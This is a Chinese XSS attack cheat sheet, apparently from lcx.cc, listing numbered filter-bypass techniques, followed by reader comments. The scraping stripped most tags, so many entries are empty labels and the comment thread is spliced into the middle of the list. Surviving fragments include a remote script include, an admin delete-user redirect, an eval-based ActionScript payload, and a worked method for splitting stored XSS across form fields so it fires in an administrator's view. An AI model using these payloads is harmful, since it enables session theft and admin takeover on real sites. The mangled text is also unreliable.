XSS JavaScript 跨站脚本攻击汇总

(1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签
">

(7)formCharCode标签(计算器)

(8)UTF-8的Unicode编码(计算器)

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将Javascript分开

(12)嵌入式编码标签,将Javascript分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

(16)解决限制字符(要求同页面)

(17)空字符
perl -e 'print "";' > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "alert("XSS")IPT>";' > out

(19)Spaces和meta前的IMG标签

(20)Non-alpha-non-digit XSS

(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3

(23)双开括号
alert("XSS");//

(24)无结束脚本标记(仅火狐等浏览器)

(29)换码过滤的JavaScript
";alert('XSS');//

(30)结束Title标签

(31)Input Image

(32)BODY Image

(33)BODY标签

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)

• XSS

  (40)IMG VBscript
  

  • XSS

    (41)META链接url
    

    (42)Iframe
    

    (43)Frame

    (44)Table

    (45)TD

    由于XSS被安全狗拦截。所以找不到50一下。在带上JS的代码

    本站回复：

    嗯，这种的很好解决，多段插入即可，可以参考文章：http://lcx.cc/?i=1529，（也就是本页“(16)解决限制字符(要求同页面)”所讲的……）
    需要发四条【连续的】留言，内容如下：

    第一条：

    留言顺序：如果他留言显示方式，是先发的在底下显示（按时间倒叙，大多数情况是这样的），那么你留言的顺序是从四到一；如果是新发的在上边显示（按时间顺序），那么你留言的顺序是从一到四。
    操作完成后，会产生如下效果：

    这样就完全突破字符数量限制了，想插多少插多少……
    如果用户名、昵称、密码也可以利用的话，则更简单，可以自由发挥。

    ">'>

    本站回复：

    小菜鸟 @ 2013-12-16 23:23:20

    核总
    

    我想用这个解决字符不够问题，但是他不光过滤script 还过滤+ 导致无法执行。有没有法子不用这个加号？听他们说可以正则利用，执行在替换回来加号。具体代码是什么？谢谢

    本站回复：

    编码字符串

    佚名 @ 2013-12-17 12:01:37

    猜猜我是信

    本站回复：

    你猜我猜不猜

    佚名 @ 2013-12-17 16:40:05

    怎么看怎么都是好东西，

    本站回复：

    Good Good Study, Day Day UP!

    Mike @ 2014-04-21 18:47:33

    核总，我发现了一个做工很粗糙的钓鱼站，想攻一下玩玩，但现在转来转去只看到一个钓鱼页，该怎样找出根目录下的其他页面？能输入的地方也只有两个框，似乎屏蔽尖括号。

    本站回复：

    使用网站目录扫描类工具扫描即可，例如：http://lcx.cc/?i=2330

    文章作者
    Nuclear'Atk

    上次更新
    
    2011-07-29

    许可协议
    Nuclear'Atk（核攻击）网络安全实验室版权所有，转载请注明出处。

    (46)DIV background-image (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) (48)DIV expression (49)STYLE属性分拆表达 (50)匿名STYLE(组成:开角号和一个字母开头) (51)STYLE background-image (52)IMG STYLE方式 exppression(alert("XSS"))'> (53)STYLE background (54)BASE (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS (56)在flash中使用ActionScrpt可以混进你XSS的代码 a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval_r(a+b+c+d); (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 XSS (58)如果过滤了你的JS你可以在图片里添加JS代码来利用 (59)IMG嵌入式命令,可执行任意命令 (60)IMG嵌入式命令(a.jpg在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser (61)绕符号过滤 (62) (63) (64) (65) (66) (67) PT SRC="http://3w.org/xss.js"> (68)URL绕行 XSS (69)URL编码 XSS (70)IP十进制 XSS (72)IP八进制 tt p://6 6.000146.0×7.147/"">XSS (74)节省[http:] XSS (75)节省[www] XSS (76)绝对点绝对DNS XSS (77)javascript链接 XSS 留言评论（旧系统）： piaoyu @ 2011-07-30 09:58:08 让你网站不能访问？ 本站回复： 啥？一直可以访问啊，秒开~~ 佚名 @ 2013-04-04 21:30:37 核总你好。你可知道还有没有其他 XSS代码？不能超过48字符的。 本站回复： xss要根据具体情况，其灵活度很高的，以下是40个字符并且图片不显示例子： 佚名 @ 2013-04-05 21:23:37 核老大。 我这样写对么？ 我这样写。结果溢出了。。Stack overflow at line: 0 IMG标签加入JS文件字符就多了。有没有加了JS地址后。代码不超过50的？ 本站回复： 你的语法完全错误，目测你需要恶补html+js基础语法知识。 具体要看插入点，你最好把插入点发出来看看。 佚名 @ 2013-04-06 18:32:06 饿。不好意思核老大。 我是把XSS插入在EMAIL中。没有字符过滤。但是数据库的字符最多是50. 等管理员打开的时候查看用户就会出发。下面是查看用户时的源代码。
    用户名2222	昵称11111	邮箱	密码123
    用户名2222	昵称11111	邮箱	密码123
    用户名2222	昵称11111	邮箱*/ x=''; /*	密码123
    用户名2222	昵称11111	邮箱*/ x = x + ''+'ipt>';document.write(x); /*	密码123
    用户名2222	昵称11111	邮箱*/ alert('测试');	密码123

文章来源于lcx.cc:XSS JavaScript 跨站脚本攻击汇总